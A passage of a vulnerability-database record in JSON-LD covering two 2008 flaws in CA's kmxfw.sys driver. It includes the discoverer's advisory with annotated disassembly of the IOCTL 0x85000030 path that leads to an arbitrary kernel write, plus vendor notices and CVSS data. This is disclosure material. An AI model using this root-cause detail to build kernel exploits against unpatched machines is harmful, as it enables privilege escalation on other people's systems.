"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-08-12T00:00:00",
"db": "VULHUB",
"id": "VHN-33299"
},
{
"date": "2008-08-11T00:00:00",
"db": "BID",
"id": "30651"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-003251"
},
{
"date": "2008-08-13T01:46:19",
"db": "PACKETSTORM",
"id": "68975"
},
{
"date": "2008-08-13T05:41:53",
"db": "PACKETSTORM",
"id": "69034"
},
{
"date": "2008-08-12T23:41:00",
"db": "NVD",
"id": "CVE-2008-3174"
},
{
"date": "2008-08-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200808-174"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-11T00:00:00",
"db": "VULHUB",
"id": "VHN-33299"
},
{
"date": "2008-08-25T22:25:00",
"db": "BID",
"id": "30651"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-003251"
},
{
"date": "2018-10-11T20:47:30.877000",
"db": "NVD",
"id": "CVE-2008-3174"
},
{
"date": "2008-09-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200808-174"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200808-174"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "CA Internet Security Suite Used for etc. CA HIPS of kmxfw.sys Service disruption in drivers (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-003251"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200808-174"
}
],
"trust": 0.6
}
}
VAR-200808-0147
Vulnerability from variot - Updated: 2023-12-18 12:12The kmxfw.sys driver in CA Host-Based Intrusion Prevention System (HIPS) r8, as used in CA Internet Security Suite and Personal Firewall, does not properly verify IOCTL requests, which allows local users to cause a denial of service (system crash) or possibly gain privileges via a crafted request. Computer Associates products are prone to two vulnerabilities. Attackers may exploit the first vulnerability locally to execute arbitrary code with SYSTEM-level privileges or cause a system crash. Attackers may exploit the second vulnerability remotely to cause denial-of-service conditions. Successful attacks will completely compromise the computer or cause denial-of-service conditions. CA Host-Based Intrusion Prevention System (HIPS) is CA's host intrusion prevention system software. There is a vulnerability in the kmxfw.sys driver in CA HIPS r8.
No special user rights are necessary to exploit the vulnerability.
====================== Technical description: ======================
The IOCTL call 0x85000030 of the KmxFw.sys kernel driver shipped with various CA products accepts user supplied input that doesn't get validated enough. In consequence it is possible to pass arbitrary parameter values to some windows kernel functions (e.g. ExFreePoolWithTag). If these parameters are carefully crafted it is possible to force the windows kernel into performing a memory corruption that leads to full control of the kernel execution flow.
Disassembly of KmxFw.sys (version 6.5.5.5):
[...]
.text:00019800 mov eax, [esp+IOCTLControlCode] <-- (1)
.text:00019804 sub esp, 2Ch
.text:00019807 push ebx
.text:00019808 push esi
.text:00019809 push edi
.text:0001980A add eax, 7AFFFFFCh
.text:0001980F xor edi, edi
.text:00019811 xor ebx, ebx
.text:00019813 cmp eax, 4Ch ; switch 77 cases
.text:00019816 ja loc_19943 ; default
[...]
.text:0001981C movzx eax, ds:byte_19BA0[eax] <-- (2)
.text:00019823 jmp ds:off_19B6C[eax*4] ; switch jump
[...]
.text:000199E1 loc_199E1:
.text:000199E1 cmp [esp+38h+InputBufferSize], 10h <-- (3)
.text:000199E6 jb loc_19943 ; default
[...]
.text:000199EC mov eax, [esp+38h+InputBuffer] <-- (4)
.text:000199F0 mov ecx, [eax+8] <-- (5)
.text:000199F3 mov edx, [eax] <-- (6)
.text:000199F5 push ecx ; BaseAddress <-- (7)
.text:000199F6 push edx ; Mdl <-- (8)
.text:000199F7 mov ecx, offset off_28600
.text:000199FC call sub_12B70 <-- (9)
[...]
(1) IOCTL control code is copied into EAX (2) IOCTL control code switch cases (3) Switch case of the vulnerable IOCTL control code 0x85000030. There's also a minor check of the IOCTL input buffer size (must be greater than 0x10). (4) Pointer to user controlled data is copied into EAX (5) Part of the user controlled data is copied into ECX (6) Part of the user controlled data is copied into EDX (7) + (8) The user controlled values of ECX and EDX are used as parameters for the following function (sub_12B70) that gets called (9) The function sub_12B70 gets called
[...]
.text:00012B70 sub_12B70 proc near
.text:00012B70 Mdl_uc = dword ptr 4
.text:00012B70 BaseAddress_uc = dword ptr 8
.text:00012B70
.text:00012B70 push esi
.text:00012B71 mov esi, [esp+4+Mdl_uc] <-- (10)
.text:00012B75 test esi, esi
.text:00012B77 jz short loc_12B90
.text:00012B79 mov eax, [esp+4+BaseAddress_uc] <-- (11)
.text:00012B7D test eax, eax
.text:00012B7F jz short loc_12B89
.text:00012B81 push esi ; MemoryDescriptorList <-- (12)
.text:00012B82 push eax ; BaseAddress <-- (13)
.text:00012B83 call ds:MmUnmapLockedPages <-- (14)
.text:00012B89
.text:00012B89 loc_12B89:
.text:00012B89 push esi ; Mdl <-- (15)
.text:00012B8A call ds:IoFreeMdl <-- (16)
[...]
(10) User controlled data gets copied into ESI
(11) User controlled data gets copied into EAX
(12) + (13) The user controlled values of ESI and EAX are used as
parameters for the windows kernel function MmUnmapLockedPages
(14) The windows kernel function MmUnmapLockedPages gets called
(15) The user controlled value in ESI is used as a parameter for the
windows kernel function IoFreeMdl
(16) The windows kernel function IoFreeMdl gets called
In the IoFreeMdl function of the windows kernel the ExFreePoolWithTag function gets called with user controlled parameters.
Example of the IoFreeMdl function of the Windows 2000 Professional SP4 kernel:
[...]
.text:0041E700 ; void __stdcall IoFreeMdl(PMDL Mdl)
.text:0041E700 public IoFreeMdl
.text:0041E700 IoFreeMdl proc near
.text:0041E700
.text:0041E700 P = dword ptr 4
.text:0041E700
.text:0041E700 push esi
.text:0041E701 mov esi, [esp+4+P] <-- (17)
.text:0041E705 test byte ptr [esi+6], 20h
.text:0041E709 jz short loc_41E714
[...]
.text:0041E714 loc_41E714:
.text:0041E714 mov ax, [esi+6]
.text:0041E718 test al, 8
.text:0041E71A jz short loc_41E72B
[...]
.text:0041E72B
.text:0041E72B loc_41E72B:
.text:0041E72B push esi ; P <-- (18)
.text:0041E72C call ExFreePool <-- (19)
[...]
(17) The user controlled data gets copied into ESI (18) + (19) ESI is used as a parameter for the ExFreePool kernel function that calls ExFreePoolWithTag
If the user supplied parameter for ExFreePoolWithTag is carefully crafted it is possible to overwrite an arbitrary memory location with an arbitrary dword value (write4 primitive). This can be exploited to control the kernel execution flow and to execute arbitrary code at the kernel level.
========= Solution: =========
See vendor recommendations described under [1].
======== History: ========
2008/03/06 - Vendor notified using vuln@ca.com 2008/03/06 - Vendor response with PGP key 2008/03/08 - Detailed vulnerability information sent to the vendor 2008/03/08 - Vendor acknowledges receipt of the information 2008/08/12 - Coordinated disclosure
======== Credits: ========
Vulnerability found and advisory written by Tobias Klein.
=========== References: ===========
[1] http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36559 [2] http://www.trapkit.de/advisories/TKADV2008-006.txt
======== Changes: ========
Revision 0.1 - Initial draft release to the vendor Revision 1.0 - Public release
=========== Disclaimer: ===========
The information within this advisory may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information.
================== PGP Signature Key: ==================
http://www.trapkit.de/advisories/tk-advisories-signature-key.asc
Copyright 2008 Tobias Klein.
2) An unspecified error in the kmxfw.sys driver can be exploited to cause a DoS.
PROVIDED AND/OR DISCOVERED BY: The vendor credits: 1) Tobias Klein 2) Elazar Broad
ORIGINAL ADVISORY: CA: http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36559 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36560
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Title: CA Host-Based Intrusion Prevention System SDK kmxfw.sys Multiple Vulnerabilities
CA Advisory Date: 2008-08-11
Reported By: CVE-2008-2926 - Tobias Klein CVE-2008-3174 - Elazar Broad
Impact: A remote attacker can cause a denial of service or possibly execute arbitrary code. CA has issued updates to address the vulnerabilities. The first vulnerability, CVE-2008-2926, occurs due to insufficient verification of IOCTL requests by the kmxfw.sys driver. The second vulnerability, CVE-2008-3174, occurs due to insufficient validation by the kmxfw.sys driver. An attacker can make a request that can cause a system crash.
Mitigating Factors: None
Severity: CA has given these vulnerabilities a Medium risk rating. CA Personal Firewall Engine 1.2.276 and later are not affected. To ensure that the latest automatic update is installed on your computer, customers can view the Help>About screen in their CA Personal Firewall product and confirm that the engine version number is 1.2.276 or higher. For support information, visit http://shop.ca.com/support.
How to determine if you are affected: 1. Using Windows Explorer, locate the file "kmxfw.sys". By default, the file is located in the "C:\Windows\system32\drivers\" directory. 2. Right click on the file and select Properties. 3. Select the General tab. 4. If the file version is less than indicated in the below table, the installation is vulnerable.
For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your findings to our product security response team. https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782
Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2008 CA. All rights reserved.
-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.5.3 (Build 5003)
wj4DBQFIoduueSWR3+KUGYURAmmKAJ9FWl5gIZrbrGhg5CZ0NKzw0QE8qQCY+Qys ekQdlRjiIYnyp9WEqqGAxQ== =ltU4 -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200808-0147",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "host based intrusion prevention system",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "r8"
},
{
"model": "personal firewall 2007",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "personal firewall 2008",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "internet security suite 2008",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "host-based intrusion prevention system",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "r8"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "2007"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "2008"
},
{
"model": "personal firewall",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "2007"
},
{
"model": "personal firewall",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "2008"
},
{
"model": "personal firewall 2007",
"scope": null,
"trust": 0.6,
"vendor": "ca",
"version": null
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "3.0"
},
{
"model": "personal firewall 2008",
"scope": null,
"trust": 0.6,
"vendor": "ca",
"version": null
},
{
"model": "internet security suite 2008",
"scope": null,
"trust": 0.6,
"vendor": "ca",
"version": null
},
{
"model": "associates personal firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2008"
},
{
"model": "associates personal firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2007"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20080"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20070"
},
{
"model": "associates host-based intrusion prevention system r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates personal firewall engine",
"scope": "ne",
"trust": 0.3,
"vendor": "computer",
"version": "1.2.276"
}
],
"sources": [
{
"db": "BID",
"id": "30651"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-002498"
},
{
"db": "NVD",
"id": "CVE-2008-2926"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-164"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:ca:personal_firewall_2008:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:host_based_intrusion_prevention_system:r8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:internet_security_suite:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:internet_security_suite_2008:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:personal_firewall_2007:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2008-2926"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Tobias Klein, Elazar Broad",
"sources": [
{
"db": "BID",
"id": "30651"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-164"
}
],
"trust": 0.9
},
"cve": "CVE-2008-2926",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 7.2,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2008-2926",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "VHN-33051",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2008-2926",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200808-164",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-33051",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-33051"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-002498"
},
{
"db": "NVD",
"id": "CVE-2008-2926"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-164"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The kmxfw.sys driver in CA Host-Based Intrusion Prevention System (HIPS) r8, as used in CA Internet Security Suite and Personal Firewall, does not properly verify IOCTL requests, which allows local users to cause a denial of service (system crash) or possibly gain privileges via a crafted request. Computer Associates products are prone to two vulnerabilities. \nAttackers may exploit the first vulnerability locally to execute arbitrary code with SYSTEM-level privileges or cause a system crash. Attackers may exploit the second vulnerability remotely to cause denial-of-service conditions. \nSuccessful attacks will completely compromise the computer or cause denial-of-service conditions. CA Host-Based Intrusion Prevention System (HIPS) is CA\u0027s host intrusion prevention system software. There is a vulnerability in the kmxfw.sys driver in CA HIPS r8. \n\nNo special user rights are necessary to exploit the vulnerability. \n\n\n======================\nTechnical description:\n======================\n\nThe IOCTL call 0x85000030 of the KmxFw.sys kernel driver shipped with\nvarious CA products accepts user supplied input that doesn\u0027t get validated \nenough. In consequence it is possible to pass arbitrary parameter values \nto some windows kernel functions (e.g. ExFreePoolWithTag). If these \nparameters are carefully crafted it is possible to force the windows kernel\ninto performing a memory corruption that leads to full control of the \nkernel execution flow. \n\nDisassembly of KmxFw.sys (version 6.5.5.5):\n\n[...]\n.text:00019800 mov eax, [esp+IOCTLControlCode] \u003c-- (1)\n.text:00019804 sub esp, 2Ch\n.text:00019807 push ebx\n.text:00019808 push esi\n.text:00019809 push edi\n.text:0001980A add eax, 7AFFFFFCh\n.text:0001980F xor edi, edi\n.text:00019811 xor ebx, ebx\n.text:00019813 cmp eax, 4Ch ; switch 77 cases\n.text:00019816 ja loc_19943 ; default\n[...]\n.text:0001981C movzx eax, ds:byte_19BA0[eax] \u003c-- (2)\n.text:00019823 jmp ds:off_19B6C[eax*4] ; switch jump\n[...]\n.text:000199E1 loc_199E1: \n.text:000199E1 cmp [esp+38h+InputBufferSize], 10h \u003c-- (3)\n.text:000199E6 jb loc_19943 ; default\n[...]\n.text:000199EC mov eax, [esp+38h+InputBuffer] \u003c-- (4)\n.text:000199F0 mov ecx, [eax+8] \u003c-- (5)\n.text:000199F3 mov edx, [eax] \u003c-- (6)\n.text:000199F5 push ecx ; BaseAddress \u003c-- (7) \n.text:000199F6 push edx ; Mdl \u003c-- (8)\n.text:000199F7 mov ecx, offset off_28600\n.text:000199FC call sub_12B70 \u003c-- (9)\n[...]\n\n(1) IOCTL control code is copied into EAX\n(2) IOCTL control code switch cases\n(3) Switch case of the vulnerable IOCTL control code 0x85000030. There\u0027s\n also a minor check of the IOCTL input buffer size (must be greater than\n 0x10). \n(4) Pointer to user controlled data is copied into EAX\n(5) Part of the user controlled data is copied into ECX\n(6) Part of the user controlled data is copied into EDX\n(7) + (8) The user controlled values of ECX and EDX are used as parameters \n for the following function (sub_12B70) that gets called\n(9) The function sub_12B70 gets called\n\n[...]\n.text:00012B70 sub_12B70 proc near \n.text:00012B70 Mdl_uc = dword ptr 4\n.text:00012B70 BaseAddress_uc = dword ptr 8\n.text:00012B70\n.text:00012B70 push esi\n.text:00012B71 mov esi, [esp+4+Mdl_uc] \u003c-- (10)\n.text:00012B75 test esi, esi\n.text:00012B77 jz short loc_12B90\n.text:00012B79 mov eax, [esp+4+BaseAddress_uc] \u003c-- (11)\n.text:00012B7D test eax, eax\n.text:00012B7F jz short loc_12B89\n.text:00012B81 push esi ; MemoryDescriptorList \u003c-- (12)\n.text:00012B82 push eax ; BaseAddress \u003c-- (13)\n.text:00012B83 call ds:MmUnmapLockedPages \u003c-- (14)\n.text:00012B89\n.text:00012B89 loc_12B89: \n.text:00012B89 push esi ; Mdl \u003c-- (15)\n.text:00012B8A call ds:IoFreeMdl \u003c-- (16)\n[...]\n\n(10) User controlled data gets copied into ESI\n(11) User controlled data gets copied into EAX\n(12) + (13) The user controlled values of ESI and EAX are used as \n parameters for the windows kernel function MmUnmapLockedPages\n(14) The windows kernel function MmUnmapLockedPages gets called\n(15) The user controlled value in ESI is used as a parameter for the \n windows kernel function IoFreeMdl\n(16) The windows kernel function IoFreeMdl gets called\n\nIn the IoFreeMdl function of the windows kernel the ExFreePoolWithTag \nfunction gets called with user controlled parameters. \n \nExample of the IoFreeMdl function of the Windows 2000 Professional SP4 \nkernel:\n \n[...]\n.text:0041E700 ; void __stdcall IoFreeMdl(PMDL Mdl)\n.text:0041E700 public IoFreeMdl\n.text:0041E700 IoFreeMdl proc near \n.text:0041E700\n.text:0041E700 P = dword ptr 4\n.text:0041E700\n.text:0041E700 push esi\n.text:0041E701 mov esi, [esp+4+P] \u003c-- (17)\n.text:0041E705 test byte ptr [esi+6], 20h\n.text:0041E709 jz short loc_41E714\n[...]\n.text:0041E714 loc_41E714: \n.text:0041E714 mov ax, [esi+6]\n.text:0041E718 test al, 8\n.text:0041E71A jz short loc_41E72B\n[...]\n.text:0041E72B\n.text:0041E72B loc_41E72B:\n.text:0041E72B push esi ; P \u003c-- (18)\n.text:0041E72C call ExFreePool \u003c-- (19)\n[...]\n\n(17) The user controlled data gets copied into ESI\n(18) + (19) ESI is used as a parameter for the ExFreePool kernel function \n that calls ExFreePoolWithTag\n\nIf the user supplied parameter for ExFreePoolWithTag is carefully crafted \nit is possible to overwrite an arbitrary memory location with an arbitrary \ndword value (write4 primitive). This can be exploited to control the kernel\nexecution flow and to execute arbitrary code at the kernel level. \n\n\n=========\nSolution:\n=========\n\n See vendor recommendations described under [1]. \n\n\n========\nHistory:\n========\n\n 2008/03/06 - Vendor notified using vuln@ca.com\n 2008/03/06 - Vendor response with PGP key\n 2008/03/08 - Detailed vulnerability information sent to the vendor \n 2008/03/08 - Vendor acknowledges receipt of the information\n 2008/08/12 - Coordinated disclosure\n\n\n========\nCredits:\n========\n\n Vulnerability found and advisory written by Tobias Klein. \n\n\n===========\nReferences:\n===========\n\n [1] http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36559\n [2] http://www.trapkit.de/advisories/TKADV2008-006.txt\n\n\n========\nChanges:\n========\n\n Revision 0.1 - Initial draft release to the vendor\n Revision 1.0 - Public release\n\n\n===========\nDisclaimer:\n===========\n\nThe information within this advisory may change without notice. Use\nof this information constitutes acceptance for use in an AS IS\ncondition. There are no warranties, implied or express, with regard\nto this information. In no event shall the author be liable for any\ndirect or indirect damages whatsoever arising out of or in connection\nwith the use or spread of this information. \n\n\n==================\nPGP Signature Key:\n==================\n\n http://www.trapkit.de/advisories/tk-advisories-signature-key.asc\n\n\nCopyright 2008 Tobias Klein. \n\n2) An unspecified error in the kmxfw.sys driver can be exploited to\ncause a DoS. \n\nPROVIDED AND/OR DISCOVERED BY:\nThe vendor credits:\n1) Tobias Klein\n2) Elazar Broad\n\nORIGINAL ADVISORY:\nCA:\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36559\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36560\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nTitle: CA Host-Based Intrusion Prevention System SDK kmxfw.sys \nMultiple Vulnerabilities\n\n\nCA Advisory Date: 2008-08-11\n\n\nReported By:\nCVE-2008-2926 - Tobias Klein\nCVE-2008-3174 - Elazar Broad\n\n\nImpact: A remote attacker can cause a denial of service or \npossibly execute arbitrary code. CA has issued \nupdates to address the vulnerabilities. The first vulnerability, \nCVE-2008-2926, occurs due to insufficient verification of IOCTL \nrequests by the kmxfw.sys driver. The second vulnerability, \nCVE-2008-3174, occurs due to insufficient validation by the \nkmxfw.sys driver. An attacker can make a request that can cause a \nsystem crash. \n\n\nMitigating Factors: None\n\n\nSeverity: CA has given these vulnerabilities a Medium risk rating. CA Personal Firewall Engine 1.2.276 and later are not \naffected. To ensure that the latest automatic update is installed \non your computer, customers can view the Help\u003eAbout screen in \ntheir CA Personal Firewall product and confirm that the engine \nversion number is 1.2.276 or higher. For support information, \nvisit http://shop.ca.com/support. \n\n\nHow to determine if you are affected:\n1. Using Windows Explorer, locate the file \"kmxfw.sys\". By default, \n the file is located in the \"C:\\Windows\\system32\\drivers\\\" directory. \n2. Right click on the file and select Properties. \n3. Select the General tab. \n4. If the file version is less than indicated in the below table, \n the installation is vulnerable. \n\nFor technical questions or comments related to this advisory, \nplease send email to vuln AT ca DOT com. \n\nIf you discover a vulnerability in CA products, please report your \nfindings to our product security response team. \nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782\n\n\nRegards,\nKen Williams ; 0xE2941985\nDirector, CA Vulnerability Research\n\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2008 CA. All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 9.5.3 (Build 5003)\n\nwj4DBQFIoduueSWR3+KUGYURAmmKAJ9FWl5gIZrbrGhg5CZ0NKzw0QE8qQCY+Qys\nekQdlRjiIYnyp9WEqqGAxQ==\n=ltU4\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2008-2926"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-002498"
},
{
"db": "BID",
"id": "30651"
},
{
"db": "VULHUB",
"id": "VHN-33051"
},
{
"db": "PACKETSTORM",
"id": "69035"
},
{
"db": "PACKETSTORM",
"id": "68975"
},
{
"db": "PACKETSTORM",
"id": "69034"
}
],
"trust": 2.25
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
